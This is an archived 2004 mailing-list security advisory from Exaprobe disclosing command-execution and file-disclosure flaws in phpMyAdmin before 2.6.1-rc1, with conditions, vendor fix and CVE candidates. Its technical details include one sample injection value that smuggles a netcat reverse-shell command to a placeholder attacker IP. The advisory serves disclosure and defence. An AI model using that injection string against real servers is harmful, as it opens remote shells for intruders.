[VulnWatch] Multiple vulnerabilities in phpMyAdmin

• Previous message: Daniel Fabian: "SugarSales Multiple Vulnerabilities"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, vulnwatch@vulnwatch.org
Date: Mon, 13 Dec 2004 14:02:09 +0100

                                Exaprobe
                            www.exaprobe.com

                           Security Advisory

 Advisory Name: Multiple vulnerabilities in phpMyAdmin
  Release Date: 13 December 2004
   Application: phpMyAdmin prior to 2.6.1-rc1
      Platform: Any webserver running PHP
      Severity: Remote code execution
        Author: Nicolas Gregoire <ngregoire@exaprobe.com>
 Vendor Status: Updated code is available
CVE Candidates: CAN-2004-1147 and CAN-2004-1148
     Reference: www.exaprobe.com/labs/advisories/esa-2004-1213.html

Overview :
==========

phpMyAdmin is a tool written in PHP intended to handle the
administration of MySQL over the Web. Currently it can create and
drop databases, create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields, manage privileges,
export data into various formats and is available in 47 languages.

Technical details :
===================

Command execution :

        - bug introduced in 2.6.0-pl2
        - attacker does *not* need access to the phpMyAdmin interface
        - PHP safe mode must be off
        - external transformations must be activated
        - sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

File disclosure :

        - attacker need access to the phpMyAdmin interface
        - PHP safe mode must be off
        - $cfg['UploadDir'] must be defined
        - exploitation is done via 'sql_localfile'

Vendor Response :
=================

After notification by Exaprobe, maintainers of the phpMyAdmin
project have released version 2.6.1-rc1 which fixes these two
vulnerabilities.

Recommendation :
================

Upgrade to 2.6.1-rc1 or newer.
Desactivate uploads and transformations if possible.

CVE Information :
=================

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues. These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

  CAN-2004-1147 Command execution in phpMyAdmin
  CAN-2004-1148 File disclosure in phpMyAdmin

-- 
Nicolas Gregoire ----- Consultant en Sécurité des Systèmes d'Information
ngregoire@exaprobe.com ------[ ExaProbe ]------ http://www.exaprobe.com/
PGP KeyID:CA61B44F  FingerPrint:1CC647FF1A55664BA2D2AFDACA6A21DACA61B44F

• Previous message: Daniel Fabian: "SugarSales Multiple Vulnerabilities"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages [Full-Disclosure] Multiple vulnerabilities in phpMyAdmin ... Advisory Name: Multiple vulnerabilities in phpMyAdmin ... CVE Candidates: CAN-2004-1147 and CAN-2004-1148 ... (Full-Disclosure) Multiple vulnerabilities in phpMyAdmin ... Advisory Name: Multiple vulnerabilities in phpMyAdmin ... CVE Candidates: CAN-2004-1147 and CAN-2004-1148 ... (Bugtraq) [VulnWatch] Multiple vulnerabilities in phpMyAdmin ... Advisory Name: Multiple vulnerabilities in phpMyAdmin ... CVE Candidates: CAN-2004-1147 and CAN-2004-1148 ... (VulnWatch) Multiple vulnerabilities in phpMyAdmin ... Advisory Name: Multiple vulnerabilities in phpMyAdmin ... CVE Candidates: CAN-2004-1147 and CAN-2004-1148 ... (Full-Disclosure) [SECURITY] [DSA 1557-1] New phpmyadmin packages fix several vulnerabilities ... Several remote vulnerabilities have been discovered in phpMyAdmin, ... Vulnerabilities and Exposures project identifies the following problems: ... If you are using the apt-get package manager, ... Size/MD5 checksum: 3500563 f598509b308bf96aee836eb2338f523c ... (Bugtraq)